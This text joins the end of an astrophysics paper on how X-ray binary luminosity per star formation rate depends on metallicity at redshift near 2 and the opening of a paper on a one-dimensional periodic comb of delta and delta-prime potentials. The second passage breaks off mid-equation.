A key source of systematic uncertainty which may impact our results is the choice of SFR indicator. Different SFR indicators probe different star formation timescales and it is debated how different indicators evolve with redshift. As described in \S\ref{sec:hasfr}, for our default SFR measurements, we use H$\alpha$ SFRs with a $Z$-dependent $L_{\mathrm{H}\alpha}$-SFR conversion factor. In this section, we explore how adopting different SFR indicators would impact our results. \par
Figure \ref{fig:lxsfrdiff} displays $L_{\mathrm{X}}$/SFR as a function of $Z$ based on different SFR indicators. Although we consider six different SFR indicators (see \S\ref{sec:sed}-\ref{sec:hasfr} for details), for simplicity we only show four of them in Figure \ref{fig:lxsfrdiff}, which provide a representative view of the impact of different SFR indicators. Since SED-derived SFRs that adopt a delayed-$\tau$ SFH are consistent within 0.1 dex with those that adopt a constant SFH, we only discuss results based on the assumption of constant SFH.
\par
The sSFR range of the galaxies in the stacks shown in Figure \ref{fig:lxsfrdiff} was restricted so that the $\langle sSFR \rangle$ of the different stacks varies by $<0.2$ dex. As discussed in \S\ref{sec:zdep}, we found it is important to try to match the sSFR distribution between the different $Z$ stacks as much as possible to control for the sSFR-dependent LMXB contribution. Since the typical SFRs of the galaxies in our sample vary depending on the SFR indicator, the common sSFR range we adopt also depends on the SFR indicator. The log(sSFR/yr$^{-1}$) ranges are -9.2 to -8.4 for the $Z=0.02$ H$\alpha$ SFRs, -9.35 to -8.55 for the $Z=0.004$ H$\alpha$ SFRs, -9.05 to -8.5 for the $Z=0.02$ SED SFRs with the \citet{calzetti00} extinction curve, and -9.5 to -8.9 for the $Z=0.004$ SED SFRs with the SMC extinction curve. \par
For each SFR indicator, we calculate the probability that the stacked $L_{\mathrm{X}}$/SFR is anti-correlated with $Z$. Assuming a power-law relationship between $L_{\mathrm{X}}$/SFR and $Z$, for all SFR indicators, we find that a negative power-law index is favored over an index $\geq 0$. A negative correlation is favored with 83\% and 84\% probability when using the H$\alpha$-derived SFRs with $Z=0.02$ and $Z=0.004$, respectively, and with 99.4\% and 74\% confidence when using SED-derived SFRs with $Z=0.02$ and $Z=0.004$, respectively. Thus, while regardless of SFR indicator, an anti-correlation between the $L_{\mathrm{X}}$/SFR of XRBs and $Z$ at z$\sim2$ is suggested by the data, the choice of SFR indicator does impact the significance of this result. \par
For each SFR indicator, we also calculate the high sSFR stacks as described in \S\ref{sec:hmxb}. We find that, except for the stacks based on the SED-derived SFRs with $Z=0.004$, all the high sSFR stacks are in good agreement with the local $L_{\mathrm{X}}$-SFR-$Z$ relation from \citetalias{brorby16}, and they are inconsistent at $>99\%$ confidence with the \citetalias{madau17} model and the upper $L_{\mathrm{X}}$/SFR bound of the \citetalias{fragos13b} models. In particular, these results are not affected by the $L_{H\alpha}$-SFR conversion factor assumed. The H$\alpha$ SFRs likely provide the most reliable comparison for the local $L_{\mathrm{X}}$-SFR-$Z$ relation, because the \citetalias{brorby16}, \citetalias{mineo12}, and \citetalias{lehmer10} local measurements are based on UV+IR SFRs and the H$\alpha$ SFRs are in good agreement with UV+IR SFRs for the MOSDEF sample \citep{shivaei16}. Thus, the conclusion that the redshift evolution of $L_{\mathrm{X}}$/SFR for high sSFR galaxies is driven by the $Z$ dependence of HMXBs is fairly robust to the choice of SFR indicator.
\subsection{Other systematic effects}
\label{sec:systematics}
We investigate other sources of systematic uncertainty and their possible impact on our results.
\subsubsection{Contamination from unidentified AGN}
While we have tried to screen out AGN as much as possible with multi-wavelength selection criteria, contamination from low-luminosity AGN remains a source of uncertainty. \citet{fornasini18} find that even when luminous ($L_{\mathrm{X}}\gtrsim10^{42}-10^{43}$ erg s$^{-1}$) AGN are excluded, there is evidence for obscured, low-luminosity AGN with $\langle L_{\mathrm{X}} \rangle\approx10^{41}-10^{42}$ erg s$^{-1}$ in X-ray stacks of star-forming galaxies at $z\sim1-2$. To gain some insight into how unidentified AGN may be influencing our results, we test how relaxing our AGN exclusion criteria impacts our stacks. We experimented with including identified optical, IR, or X-ray AGN as well as all identified AGN to our stacks. At most, this expands our galaxy sample by 34 galaxies and increases the $\langle L_{\mathrm{X}} \rangle$ of the middle-$Z$ and high-$Z$ stacks by 0.1 dex (the change in $\langle L_{\mathrm{X}} \rangle$ of the low-$Z$ stack is $<0.5$ dex). While the resulting $L_{\mathrm{X}}$/SFR values of the stacks remain consistent within 1$\sigma$ statistical uncertainties, the inclusion of known AGN tends to flatten the observed $Z$ dependence. The fact that $\langle L_{\mathrm{X}} \rangle$ does not significantly increase when galaxies above the \citet{kauffmann03} line are included in the X-ray stacks is consistent with observations that many normal star-forming galaxies at $z\sim2$ can lie above this line due to enhanced nebular N/O or stellar $\alpha$ enhancement, as compared with the ionized gas and massive stars in galaxies at $z=0$ (\citealt{masters14}; \citealt{shapley15}; \citealt{sanders16a}; \citealt{steidel16}). The comparison of $L_{\mathrm{X}}$/SFR of stacks with and without identified AGN suggests that contamination from unidentified, low-luminosity AGN is unlikely to significantly impact the measured $L_{\mathrm{X}}$/SFR; if unidentified AGN have any impact at all, this comparison implies that the true HMXB-driven relation between $L_{\mathrm{X}}$/SFR and $Z$ may be even steeper than that observed. Thus, the possibility of AGN contamination does not meaningfully impact our conclusions.
\subsubsection{X-ray spectrum}
Another source of systematic uncertainty is the X-ray spectrum. While our stacks do not have sufficient net counts for spectral fitting, hardness ratios can provide rough constraints on the spectrum. For each stack, we calculated the hardness ratio based on the net counts in the $0.5-2$ keV (soft, S) and $2-7$ keV (hard, H) bands using the Bayesian estimation code BEHR \citep{park06}, which is designed for low count statistics. The hardness ratio is defined as $(H-S)/(H+S)$. Figure \ref{fig:hratio} shows the hardness ratio of stacks \#4-6 (the hardness ratios of the other stacks are very similar). As can be seen, these hardness ratios are consistent with relatively unobscured ($N_{\mathrm{H}}\lesssim10^{22}$ cm$^{-2}$) spectra with a photon index of $\Gamma=1.4-2.5$, and our adopted spectral model (unobscured, $\Gamma=2$ power-law) falls within this range. Varying the spectral parameters within the allowed ranges results in $+/-0.15$ dex variations in the stacked $L_{\mathrm{X}}$, which is comparable to the statistical uncertainties; thus, the general agreement of our stacks with the \citetalias{fragos13b} model and the local relation is not substantially affected by spectral variations. Changing the spectral parameters affects all stacks by the same logarithmic amount, so the relative differences between the stacks remain unchanged.
\begin{figure}
\centering
\includegraphics[width=0.5\textwidth]{HRvsz_nosigcut_linz_Zdiv.ps}
\vspace{0.25in}
\caption{Hardness ratios of the three stacks based on the full sample versus weighted average redshift of the stack. Blue lines show the expected hardness ratios for sources with absorbed power-law spectra; line color represents different $\Gamma$ while line style represent different column densities ($N_{\mathrm{H}}$). Our stacks are consistent with relatively unobscured ($N_{\mathrm{H}}<10^{22}$ cm$^{-2}$) spectra with $\Gamma=1.4-2.5$. }
\label{fig:hratio}
\end{figure}
\subsubsection{Redshift evolution of $Z$ indicator and chemical abundances}
Even though we use the same $Z$ indicator as \citet{brorby16} to facilitate the comparison of the MOSDEF $z\sim2$ stacks with the local $L_{\mathrm{X}}$-SFR-$Z$ relation, it remains debated how O3N2 (and other $Z$ indicators) may evolve with redshift. Studies of emission line ratios at $z\sim2$ find that the N2 indicator overestimates the gas-phase O/H due to either elevated N/O or a harder stellar ionizing spectrum at fixed O/H (\citealt{masters14}; \citealt{shapley15}; \citealt{steidel16}). While these factors may also affect the O3N2 indicator, \citeauthor{steidel14} (\citeyear{steidel14}; \citeyear{steidel16}) present evidence that the O3N2 indicator is not significantly biased. While oxygen based indicators such as O$_{32}$ or R$_{23}$ are coming to be considered more reliable than indicators which include nitrogen (\citealt{shapley15}; \citealt{sanders16a}; \citealt{sanders16b}), adopting one of these indicators would decrease our sample size even further. Furthermore, O$_{32}$ and R$_{23}$ are more impacted by reddening \citep{sanders18}. Comparing the oxygen abundances derived using O3N2 and O$_{32}$ for the subset of MOSDEF galaxies for which both indicators are available, we find that O/H values based on O3N2 are on average 0.13 dex lower than those derived from O$_{32}$. If the $\langle$ O/H $\rangle$ values of our stacks are systematically offset by this amount, they would remain in agreement with the local $L_{\mathrm{X}}$-SFR-$Z$ relation, but some of the tension with the \citetalias{madau17} and upper \citetalias{fragos13b} models would be eased.
\par
Finally, especially when comparing our results to theoretical models, it is important to keep in mind that there may be differences between nebular O/H, which we use as a $Z$ proxy, and stellar metallicity as defined by the \citetalias{fragos13b} and \citetalias{madau17} models. In particular, the chemical abundances in $z\sim2$ galaxies may be different from the solar abundance pattern assumed by the models. The $Z$ dependence of radiatively-driven stellar winds, which is the underlying cause of the $Z$ dependence of $L_{\mathrm{X}}$/SFR in HMXB population synthesis models, primarily depends on the abundance of Fe in the case of solar abundance ratios \citep{vink01}. However, \citet{steidel16} found that $z\sim2$ star-forming galaxies can be highly supersolar in O/Fe, as expected for a gas that is primarily enriched by core collapse supernovae.
Using a small sample of $z\sim2$ galaxies with [O{\small III}]$\lambda4363$ detections, including four MOSDEF galaxies, \citet{sanders19} similarly find that O/Fe is enhanced in the galaxies, but note that neither their sample nor the \citet{steidel16} sample may be representative of $z\sim2$ galaxies. \par
Nonetheless, let us consider the implications if the MOSDEF $z\sim2$ galaxies are typically supersolar in O/Fe. In this case, the line-driven winds of their stellar populations are likely dominated by C, N, and O rather than Fe. While the results of \citet{vink01} suggest that the $Z$ dependence of Fe-driven and CNO-driven winds may be similar, this issue has not been investigated for $Z>0.1 Z_{\odot}$. The \citetalias{fragos13b} and \citetalias{madau17} models we use as a point of comparison, like most current models, assume solar abundance ratios for $Z\gtrsim0.1 Z_{\odot}$, and thus their appropriateness for high redshift stellar populations should be investigated. \par
In summary, none of these systematic effects substantially alter the conclusion that the observed redshift evolution of $L_{\mathrm{X}}$/SFR is consistent with being driven by the $Z$ dependence of HMXBs.
\section{Conclusions}
\label{sec:conclusions}
We have studied the X-ray emission of a sample of 79 star-forming galaxies at $1.37<z<2.61$ in the CANDELS fields with rest-frame optical spectra from the MOSDEF survey in order to investigate the
metallicity dependence of HMXBs at $z\sim2$. While studies of local galaxies have discovered that HMXB populations in low-$Z$ galaxies are more luminous (e.g. \citealt{brorby16}), and the observed increase of $L_{\mathrm{X}}$/SFR with redshift has been attributed to this $Z$ dependence (\citealt{basu13a}; \citealt{lehmer16}), the connection between the redshift evolution and $Z$ dependence of HMXBs has not been directly tested previously.
In order to assess whether the $Z$ dependence of HMXBs can account for the observed increase in $L_{\mathrm{X}}$/SFR as a function of redshift, we (a) tested whether the $L_{\mathrm{X}}$/SFR of HMXBs depends on $Z$ at $z\sim2$ and (b) compared this trend to the local $L_{\mathrm{X}}$-SFR-$Z$ relation.
\par
After removing AGN based on multi-wavelength diagnostics, we stacked the X-ray data of star-forming galaxies from the \textit{Chandra} AEGIS-X Deep survey, the \textit{Chandra} Deep Field North, and the \textit{Chandra} Deep Field South. Investigating how the $L_{\mathrm{X}}$/SFR of our galaxies varies when they are grouped according to redshift, $Z$, and sSFR, we find the following results:
\begin{enumerate}
\item The average $L_{\mathrm{X}}$/SFR of galaxies at $z\sim1.5$ and $z\sim2.3$ is elevated compared to values for local star-forming galaxies (\citealt{lehmer10}; \citealt{mineo12}). This $\approx0.4-0.8$ dex enhancement is comparable to that observed for $z\sim2$ galaxies by previous studies (\citealt{lehmer16}; \citealt{aird17}).
\item Splitting our sample into three metallicity bins, we find that $L_{\mathrm{X}}$/SFR and $Z$ are anti-correlated with 97\% confidence at similar sSFR. This result is based on H$\alpha$-derived SFRs with $Z$-dependent conversion factors, which we consider to be the most reliable SFR indicator available for this galaxy sample. It provides the first evidence for the metallicity dependence of XRB populations at $z>0$. This trend is more likely to be driven by HMXBs than LMXBs, unless $L_{\mathrm{LMXB}}/M_*$ decreases by a factor of $\approx7$ as 12+log(O/H) increases from 8.25 to 8.45. Such large variation would be challenging to explain using current population synthesis models.
\item Stacking only galaxies with high sSFR (sSFR$>1.6\times10^{-9}$ yr$^{-1}$) in order to minimize the contribution from LMXBs, we find that the $L_{\mathrm{X}}$/SFR values of our sample are consistent with the local $L_{\mathrm{X}}$-SFR-$Z$ relation \citep{brorby16}. Thus, HMXB populations at $z\sim2$ lie on the same $L_{\mathrm{X}}$-SFR-$Z$ relation as galaxies at $z=0$. The high sSFR stacks disagree at $>3\sigma$ confidence with the upper $L_{\mathrm{X}}$/SFR bound of the \citetalias{fragos13b} HMXB models and the best-fit HMXB population synthesis model from \citetalias{madau17}.
\end{enumerate}
The three preceding results combined provide direct evidence that the enhanced $L_{\mathrm{X}}$/SFR of $z\sim2$ star-forming galaxies compared to high sSFR galaxies of similar $M_*$ in the local Universe is due to the lower metallicity of the HMXB populations in high redshift galaxies. This study thus supports the hypothesis of previous works (\citealt{basu13a}; \citealt{lehmer16}) that the observed redshift evolution of $L_{\mathrm{X}}$/SFR is the result of the $Z$ dependence of HMXBs combined with the fact that higher-redshift galaxy samples have lower metallicities on average. \par
By comparing stacks with different sSFR but similar $Z$, we are also able to estimate that the $L_{\mathrm{X}}/M_*$ due to LMXBs is $2-8\times10^{30}$ erg s$^{-1}$ $M_{\odot}^{-1}$ at $z\sim2$. This estimate is an an order of magnitude higher than local values (\citealt{gilfanov04}; \citealt{lehmer10}, but consistent with predictions from the \citetalias{fragos13b} and \citetalias{madau17} LMXB population synthesis models. \par
Possible AGN contamination, the assumed X-ray spectrum, and systematics associated with the metallicity measurements do not significantly impact our conclusions. The choice of SFR indicator can substantially affect the absolute $L_{\mathrm{X}}$/SFR values, but the result that $L_{\mathrm{X}}$/SFR varies with $Z$ and that this trend is consistent with the $L_{\mathrm{X}}$-SFR-$Z$ local relation are fairly robust to the choice of SFR indicator.
As our understanding of SFR indicators at high redshift improves, it will be important to revisit these issues. \par
Furthermore, since there is evidence that the stellar populations at $z\sim2$ may have supersolar O/Fe, it is also important to investigate the effect of $\alpha$-element enhanced abundances on HMXB population synthesis models. Current models assume solar abundance ratios, and have not studied the impact of CNO rather than Fe driven stellar winds on HMXB populations with $Z>0.1Z_{\odot}$.
\par
While our study only probes the metallicity range of 12+log(O/H)$=8.0-8.8$, our results indicate that the \citetalias{brorby16} relation and the \citetalias{fragos13b} models with lower $L_{\mathrm{X}}$/SFR normalizations provide reasonable estimates of the X-ray emission of HMXBs out to high-redshift. Thus, we encourage the adoption of these scaling relations by studies searching for faint X-ray AGN or investigating the effect of X-ray heating on the epoch of reionization.
\par
While this study provides the first direct connection between the redshift evolution and $Z$ dependence of HMXBs, future work is required to improve the statistical significance of this result and to constrain theoretical models of the $Z$ dependence of HMXBs. Larger samples of galaxies with $Z$ measurements are crucial to reduce the statistical uncertainties of the stacked $L_{\mathrm{X}}$. Future thirty-meter class telescopes will be critical for increasing such measurements at high redshifts. Expanding this study to other redshift ranges will also further test
whether the observed redshift evolution is driven by the HMXB $Z$ dependence as found by this study. Furthermore, improving measurements of the local $L_{\mathrm{X}}$-SFR-$Z$ relation by increasing the local galaxy sample size and determining its dependence on additional variables such as sSFR is important as it provides a benchmark for high-redshift studies. \par
With current X-ray instruments, the scatter in the $L_{\mathrm{X}}$-SFR-$Z$ relation can only be studied using nearby galaxy samples, while higher-redshift studies depend on stacking or other statistical techniques. In the future, the \textit{Athena X-ray Observatory} will enable the detection of large samples of individual XRB-dominated galaxies out to $z\sim1$, and the \textit{Lynx X-ray Observatory} would push these detection limits out to $z\sim6$. Combined with accurate $Z$ and SFR measurements from \textit{JWST}, the large samples of individually detected XRB-dominated galaxies provided by these future X-ray missions will enable much more detailed investigations of the multivariate dependence of $L_{\mathrm{XRB}}$ and its scatter on galaxy properties and redshift. These future analyses will help provide stronger constraints on models of stellar evolution, the progenitor channels of gravitational wave sources, and the X-ray heating of the intergalactic medium in the early Universe.
\acknowledgments
We thank G. Fabbiano and M. Elvis for fruitful conversations about this study. FMF and MK acknowledge support from \textit{Chandra} grant 17620679. We acknowledge support from NSF AAG grants AST1312780, 1312547, 1312764, and 1313171, archival grant AR13907 provided by NASA through the Space Telescope Science Institute, and grant NNX16AF54G from the NASA ADAP program. We additionally acknowledge the 3D-HST collaboration for providing spectroscopic and photometric catalogs used in the MOSDEF survey. The scientific results reported in this paper
are based on observations made by the \textit{Chandra X-ray Observatory}. This study also made use of data obtained at the W.M. Keck Observatory, which is operated as a scientific partnership among the California Institute of Technology, the University of California, and the National Aeronautics and Space Administration. The Observatory was made possible by the generous financial support of the W.M. Keck Foundation. We wish to extend special thanks to those of Hawaiian ancestry, on whose sacred mountain we are privileged to be guests. Without their generous hospitality, this work would not have been possible. This study is also based on observations made with the NASA/ESA Hubble Space Telescope, which is operated by the Association of Universities for Research in Astronomy, Inc., under NASA contract NAS 5-26555.
{\large \textit{Software}:} CIAO \citep{fruscione06}, BEHR \citep{park06}
\facilities{Chandra X-ray Observatory, Keck Observatory}
\vspace{5mm}
\bibliographystyle{aasjournal}
| 2024-02-18T23:40:04.148Z | 2019-09-20T02:00:40.000Z | algebraic_stack_train_0000 | 1,239 | 15,967 |
|
proofpile-arXiv_065-6087 | \section{Introduction}
In this paper we perform an analysis of a generalised Kronnig-Penney model built from $\delta\text{-}\delta'$ potentials. The Kronig-Penney model is a well known example of a one-dimensional periodic potential used in solid state physics to describe the motion of an electron in a periodic array of rectangular barriers or wells \cite{kronig-prsa31}. One variation of this model is the so called Dirac comb in which the rectangular barriers/wells become Dirac delta potentials with positive or negative strength respectively. The Hamiltonian for the Dirac comb is
\begin{equation}\label{1.1}
{\cal H}= -\frac{\hbar^2}{2m}\,\frac{d^2}{dy^2}+V_1(y), \quad \text{where} \quad
V_1(y)=\mu \sum_{n=-\infty}^\infty \delta(y-n y_0),\quad \mu \in \mathbb{R},\quad y_0>0,
\end{equation}
where both parameters $\mu$ and $y_0$ are fixed.
Dirac delta type potentials are exactly solvable models frequently used to describe quantum systems with very short range interactions which are located around a given point. These two properties make them suitable to obtain many general properties of realistic quantum systems \cite{textbooks,textbooks2,textbooks3}. Moreover Dirac delta potentials enable the study of the Bose-Einstein condensation in periodic backgrounds \cite{bordagJPA2019}, in a harmonic trap with a tight and deep ``dimple'' potential, modelled by a Dirac delta function \cite{Uncu}, or a nonperturbative study of the entanglement of two directed polymers subject to repulsive interactions given by a Dirac delta function potential \cite{Ferrari}. It is also interesting to use a Dirac comb to investigate the light propagation (transverse electric and magnetic modes as well as omnidirectional polarization modes) in a one-dimensional relativistic dielectric superlattice \cite{alv-rod-pre99,zur-san-pre99,lin-pre06}. These types of interactions have been used in other contexts such as in studies related with supersymmetry \cite{ignacio1,ignacio2,ignacio3,ignacio4,guilarte-epjp130}.
It is of note that although the rigorous definition of the Dirac delta potential in one dimension is well known, reproducing the definition of the Dirac delta potential standing in one point for two and three dimensional spaces is highly non-trivial \cite{textbooks3,jackiw,bordag-prd91,bordag-prd95} and requires the use of the theory of self adjoint extensions to introduce a regularization parameter.
Contact interactions or potentials, also known as zero-range potentials, can be understood as generalisations of the Dirac-$\delta$ potential by means of boundary conditions (see subsection 3.1.1 in Ref. \cite{pistones}). These types of potentials have been largely used in different areas of physics over the past 40 years. Their importance is specially relevant for applications to atomic physics developed in the 80s (see \cite{zrpap} and references therein). New mathematical tools have been introduced in physics in order to define, characterise and classify rigorously contact potentials \cite{ALB1,AK}. After the seminal papers by Berezin and Faddeev \cite{fad} and Kurasov's paper where contact potentials are characterised by certain self adjoint extensions of the one-dimensional kinetic operator $K=-d^2/dx^2$ \cite{KUR}, several attempts have been made to explain the physical meaning of the contact potentials that emerge from these extensions \cite{KP,KP1}. More recently there have been papers where, contact potentials have been used to study the effects of resonant tunneling \cite{ZOL,ZOL1}, to study their properties under the effect of external fields \cite{ZOL2}, and their applications in the study of metamaterials \cite{NIE}. In addition the effects of several contact potential barriers have been studied in \cite{LUN,KOR,EGU,EGU1,gadella-jpa16,Caudrelier} and extensions to arbitrary dimension have been considered in \cite{MNR} generalising the approach by Jackiw in \cite{jackiw}. Mathematical properties of potentials decorated with contact interactions have also been the object of recent studies \cite{LAR,ANT,GOL,GOL1,ALB,ET,SPL}. Finally, we would like to mention a wide range of physical applications that have appeared in the last year \cite{KP2,RBO,CAL,JUAN}.
Among these possible generalizations of the Dirac delta potential the most obvious to start with is the derivative of the Dirac delta, usually denoted as $\delta'(y)$. In fact, this interaction has already been considered by several authors in the past \cite{textbooks3,SE,FAS,bawa}. In combination with the Dirac delta produces a potential of the form
\begin{equation}\label{1.2}
V_2(y)= \mu\,\delta(y)+\lambda\,\delta'(y),
\end{equation}
where $\mu$ and $\lambda$ are two arbitrarily fixed real numbers. The potential \eqref{1.2} is given by the selfadjoint extension of the operator $${\cal H}_0=-\frac{\hbar^2}{2m}\frac{d^2}{dy^2}$$ defined over $\mathbb{R}/\{0\}$ by the matching conditions
\begin{equation}
\left(
\begin{array}{c}
\psi (0^+) \\ [1ex]
\psi' (0^+)
\end{array}
\right)=\left(
\begin{array}{cc}
\displaystyle\frac{\hbar^2-m\lambda}{\hbar^2+m\lambda} & 0 \\ [2ex]
\displaystyle \frac{-2\hbar^2m\mu}{\hbar^4-m^2\lambda^2} & \displaystyle\ \frac{\hbar^2+m\lambda}{\hbar^2-m\lambda}
\end{array}
\right)
\left(
\begin{array}{c}
\psi (0^-) \\ [1ex]
\psi' (0^-)
\end{array}
\right),
\end{equation}
where we denote by $f(y_0^\pm)$ the limit of the function $f(y)$ when $y$ tends to $y_0$ from the left ($y_0^-$) and from the right ($y_0^+$).
This potential was studied in \cite{GNN} and has been shown to be relevant in physics. In fact, Mu\~noz-Casta\~neda and Mateos-Guilarte \cite{JMG} had the idea to use a slight generalization of \eqref{1.2} given by
\begin{equation}\label{1.3}
V_{3}(y)=\mu_1 \delta(y+\ell/2)+\lambda_1 \delta'(y+\ell/2)+\mu_2 \delta(y-\ell/2)+\lambda_2 \delta'(y-\ell/2),
\end{equation}
to mimic the physical properties of two infinitely thin plates with an orthogonal polarization interacting with a scalar quantum field. They evaluated the quantum vacuum interaction energy between the two plates and they found positive, negative, and zero Casimir energies depending on the zone in the space of couplings. This study was continued in \cite{gadella-jpa16}, finding new interesting results. For instance, when the limit $\ell\to 0$ is taken in \eqref{1.3}, the resulting potential supported at $x=0$ is a $\delta\text{-}\delta'$ potential with couplings given as functions of $\{\mu_1, \lambda_1,\mu_2,\lambda_2\}$, that defines a non-abelian superposition law.
All these results justify the use of a derivative of the delta interaction along the delta itself. In the present paper, we propose the study of the properties of the one-dimensional periodic Hamiltonian
\begin{equation}\label{1.4}
{\cal H}= -\frac{\hbar^2}{2m}\,\frac{d^2}{dy^2}+V(y), \quad \text{where} \quad
V(y)=\sum_{n=-\infty}^\infty [\mu\,\delta(y-ny_0)+\lambda\,\delta'(y-ny_0)],
\end{equation}
where again $\mu$ and $\lambda$ are real numbers and $\ell>0$. As usual, the time independent Schr\"odinger equation for this situation should be written as
\begin{equation}\label{1.5}
{\cal H}\psi(y)\equiv -\frac{\hbar^2}{2m}\,\frac{d^2}{dy^2}\,\psi(y)+V(y)\psi(y)={\cal E}\psi(y).
\end{equation}
In order to simplify expressions and calculations, it is usual working with dimensionless quantities. To this end, we use a redefinition of some magnitudes as was done in \cite{gadella-jpa16}. We perform this redefinition in three steps:
\begin{enumerate}
\item
Magnitudes with the dimensions of a length are compared to the Compton wavelength:
\begin{equation}\label{1.6}
{\rm length\, magnitude}=\frac{\hbar}{mc}\cdot {\rm dimensionless\, magnitude} .
\end{equation}
This allows to introduce a dimensionless space coordinate over the line $x=y mc/\hbar$, as well as a dimensionless linear chain spacing $a=y_0 mc/\hbar$.
\item
The Dirac delta coupling $\mu$ has dimensions $[\mu]=ML^3T^{-2}$ and the Dirac $\delta^\prime$ coupling has dimensions $[\lambda]=ML^4T^{-2}$. Hence we can introduce two dimensionless couplings $w_0$ and $w_1$ for the $\delta$ and the $\delta^\prime$ respectively, given by
\begin{equation}\label{1.7}
\mu = \frac{\hbar c}{2} w_0,\qquad \lambda =\frac{\hbar^2}{m} w_1\,.
\end{equation}
\item
Energies are scaled in terms of $mc^2/2$, so that from \eqref{1.4} the rescaled Hamiltonian is given by
\begin{equation}\label{1.8}
H= 2 {\cal H}/mc^2=-\frac{d^2}{d x^2}+\sum_{n\in \mathbb{Z}}\left[ w_0\delta(x-n a)+2w_1\delta^\prime(x-na)\right],
\end{equation}
and the eigenenergies of the time independent Schr\"odinger equation
\begin{equation}\label{1.777}
H\psi(x)=\varepsilon\psi(x)
\end{equation}
will be $\varepsilon=2 {\cal E}/mc^2$.
\end{enumerate}
Notice that when rescaling the arguments of the $\delta$ and the $\delta'$ in \eqref{1.4} as
\begin{equation*}
{\delta(x-n y_0)=\frac{1}{y_0}\delta\left(\frac{x}{y_0}-n\right),\quad \delta'\left(x-ny_0\right)=\frac{1}{y_0^2}\delta'\left(\frac{x}{y_0}-n\right),}
\end{equation*}
then the scale of energy defined by the strength of the $\delta'$ coupling is $\lambda/y_0^2$, and the scale of energy defined by the strength of the Dirac-$\delta$ is $\mu/y_0$. It is easy to see that the ratio between both energy scales defined by the strength of the couplings can be written in terms of the Compton wavelength of the particle $\lambda^C=\hbar/(mc)$ and the linear lattice spacing $y_0$ as
\begin{equation}
\frac{\lambda}{\mu y_0}=\frac{2\lambda^C}{y_0}\frac{w_1}{w_0}.
\end{equation}
Typically, the lattice spacings in real crystals are of the order of $y_0\sim \si{\angstrom}$ and the Compton wavelength for an electron is $\lambda^C_{e^-}=3.86\cdot10^{-3}\si{\angstrom}$. Hence $\lambda/(\mu y_0)\sim 10^{-3}\frac{w_1}{w_0}$, meaning that $w_1$ should be much bigger than $w_0$ for the ratio of energy scales to be comparable.
In the sequel, we shall always work with dimensionless quantities as defined above.
The paper is organised as follows. In Section~\ref{sec_review} we review and generalise some basic results about the band structure for one-dimensional periodic potentials built from potentials with compact support smaller than the lattice spacing. In particular we remark some aspects that are not easily available in the standard literature, such as the density of states. In Section~\ref{sec_1species} we present the original results we have obtained for a particular interesting example: what we will call on the sequel the {\it one-species hybrid Dirac comb}, which corresponds to the potential \eqref{1.8} introduced before. Properties of the band spectrum, and density of states are studied in detail.
In Section~\ref{sec_2species} we deal with the {\it two-species hybrid Dirac comb}, obtained by adding an extra hybrid comb to \eqref{1.8} displaced a distance $d$ with respect to the original. Finally in Section~\ref{sec_conclusions} we give our conclusions and further comments concerning our results.
\section{Review of band structure for one-dimensional periodic potentials}
\label{sec_review}
{In this section we present some general formulas relative to one-dimensional potential chains, with a periodic potential (built from a potential $V_C(x)$ with compact support $J_0=[-\eta/2,\eta/2]$) that vanishes outside small intervals $J_n=[na-\eta/2,na+\eta/2]$, included in $I_n=[na-a/2,na+a/2]$ centered around the chain points $na$ ($n\in {\mathbb Z}$ {and $a>\eta$}), whose union gives the whole real line. The dimensionless Schr\"odinger equation associated to $V_C(x)$ is:
\begin{equation}\label{2.1}
H_C \, \psi_k(x)\equiv \left(-\frac{d^2}{dx^2}+V_C(x)\right)\psi_k(x)=k^2 \psi_k(x),
\quad \varepsilon=k^2>0.
\end{equation}}
The potential $V_C(x)$ is not necessarily even with respect to spatial reflections $x\to -x$. For \eqref{2.1}, we find two linearly independent scattering solutions: {one going from the left to the right ($R$) and the other in the opposite direction ($L$).
Outside the interval $J_0$ these scattering waves have the following form}:
\begin{equation}\label{2.2}
\psi_{k,R}(x)=
\left\{
\begin{array}{ll}
e^{-i k x} r_R(k)+e^{i k x}, & x<-\frac{\eta}2. \\ [2ex]
t_{R}(k) e^{i k x}, & x>\frac{\eta}2.
\end{array}
\right.
\qquad
\psi_{k,L}(x)=
\left\{
\begin{array}{ll}
t_{L} (k) e^{-i k x}, & x<-\frac{\eta}2. \\ [2ex]
e^{i k x} r_L(k)+e^{-i k x}, & x>\frac{\eta}2.
\end{array}
\right.
\end{equation}
The functions $\{r_R(k),r_L(k),t_R(k),t_L(k)\}$ represent right and left reflection and transmission scattering amplitudes. One interesting property of these coefficients is that $r_R(k)\neq r_L(k)$ if $V_C(x)\neq V_C(-x)$. On the other hand, time reversal symmetry of the Hamiltonian we are dealing with implies $t_R(k)=t_L(k)=t(k)$. The scattering matrix
\begin{equation}\label{2.3}
S=\left(\begin{array}{cc}
t(k) & r_R(k) \\[2ex]
r_L(k) & t(k)
\end{array} \right)
\end{equation}
is unitary. Therefore its two eigenvalues have modulus equal to $1$, and their respective arguments define the scattering phase shifts $\delta_\pm(k)$ in the so called even ($+$) and odd ($-$) channels, respectively.
\noindent {Next, we construct the periodic potential using $V_C(x)$ as building blocks. Thus, we have a Hamiltonian of the form:
\begin{equation}\label{2.4}
H_P=-{d^2}/{ dx^2}+V_P(x), \qquad \qquad V_P(x)=\sum_{n=-\infty}^\infty V_C(x-na).
\end{equation}}
In order to obtain the eigenfunctions of $H_P$, we need to use the Floquet-Bloch pseudo-periodicity conditions:
\begin{equation}\label{2.5}
\psi_q(x+a)=e^{i q a}\psi_q(x), \qquad
\psi^\prime_q(x+a)=e^{i q a}\psi^\prime_q(x),\qquad
q\in\left[-\frac{\pi}{a},\frac{\pi}{a}\right],
\end{equation}
where, as usual, we are restricting our considerations to the first Brillouin zone.
Since for each primitive cell $I_n$ the compact supported potential $V_C(x-na)$ vanishes outside the interval $ J_n=[n a- \eta/2,na+ \eta/2]$,
then on any of the intervals $\mathcal{J}_n\equiv\{x\in I_n\vert\, x\notin J_n \}$ the Bloch waves are linear combinations of the two scattering solutions centered at the point $n a$:
\begin{equation}\label{2.6}
\psi_{k,n,q}(x)=A_n\psi_{k,R}(x-na)+B_n\psi_{k,L}(x-na)\,, \quad{\rm for}\,\,x\in
\mathcal{J}_n\,.
\end{equation}
Then, we use the Floquet-Bloch pseudo-periodicity conditions given in equation \eqref{2.5} at the points $x=na-a/2$,
so as to obtain the following two linear equations for the coefficients { $A_n$ and $B_n$:
\begin{equation}\label{2.9}
\left(\begin{array}{cc}
\psi_{k,R}(a/2)-e^{i q a}\psi_{k,R}(-a/2) & \psi_{k,L}(a/2)-e^{i q a}\psi_{k,L}(-a/2)\\[2ex]
